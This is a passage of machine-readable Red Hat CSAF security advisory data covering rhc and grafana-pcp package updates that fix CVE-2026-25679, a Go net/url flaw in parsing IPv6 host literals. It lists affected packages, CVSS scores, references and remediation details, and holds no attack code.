"AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T01:48:19+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:8851"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:8851"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9090", "url": "https://access.redhat.com/errata/RHSA-2026:9090"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9090.json"}], "title": "Red Hat Security Advisory: grafana-pcp security update", "tracking": {"current_release_date": "2026-06-08T15:52:49+00:00", "generator": {"date": "2026-06-08T15:52:49+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9090", "initial_release_date": "2026-04-20T17:00:17+00:00", "revision_history": [{"date": "2026-04-20T17:00:17+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T17:00:17+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:49+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:9.2::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.1.1-5.el9_2.src", "product": {"name": "grafana-pcp-0:5.1.1-5.el9_2.src", "product_id": "grafana-pcp-0:5.1.1-5.el9_2.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.1.1-5.el9_2?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.1.1-5.el9_2.aarch64", "product": {"name": "grafana-pcp-0:5.1.1-5.el9_2.aarch64", "product_id": "grafana-pcp-0:5.1.1-5.el9_2.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.1.1-5.el9_2?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "product": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "product_id": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.1.1-5.el9_2?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "product": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "product_id": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.1.1-5.el9_2?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "product": {"name": "grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "product_id": "grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.1.1-5.el9_2?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "product": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "product_id": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.1.1-5.el9_2?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "product": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "product_id": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.1.1-5.el9_2?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.1.1-5.el9_2.x86_64", "product": {"name": "grafana-pcp-0:5.1.1-5.el9_2.x86_64", "product_id": "grafana-pcp-0:5.1.1-5.el9_2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.1.1-5.el9_2?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64", "product": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64", "product_id": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.1.1-5.el9_2?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "product": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "product_id": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.1.1-5.el9_2?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.1.1-5.el9_2.s390x", "product": {"name": "grafana-pcp-0:5.1.1-5.el9_2.s390x", "product_id": "grafana-pcp-0:5.1.1-5.el9_2.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.1.1-5.el9_2?arch=s390x"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "product": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "product_id": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.1.1-5.el9_2?arch=s390x"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "product": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "product_id": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.1.1-5.el9_2?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.1.1-5.el9_2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.aarch64"}, "product_reference": "grafana-pcp-0:5.1.1-5.el9_2.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.1.1-5.el9_2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.ppc64le"}, "product_reference": "grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.1.1-5.el9_2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.s390x"}, "product_reference": "grafana-pcp-0:5.1.1-5.el9_2.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.1.1-5.el9_2.src as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.src"}, "product_reference": "grafana-pcp-0:5.1.1-5.el9_2.src", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.1.1-5.el9_2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.x86_64"}, "product_reference": "grafana-pcp-0:5.1.1-5.el9_2.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64"}, "product_reference": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le"}, "product_reference": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x"}, "product_reference": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64"}, "product_reference": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le"}, "product_reference": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x"}, "product_reference": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64"}, "product_reference": "grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T17:00:17+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9090"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-pcp-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debuginfo-0:5.1.1-5.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-pcp-debugsource-0:5.1.1-5.el9_2.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 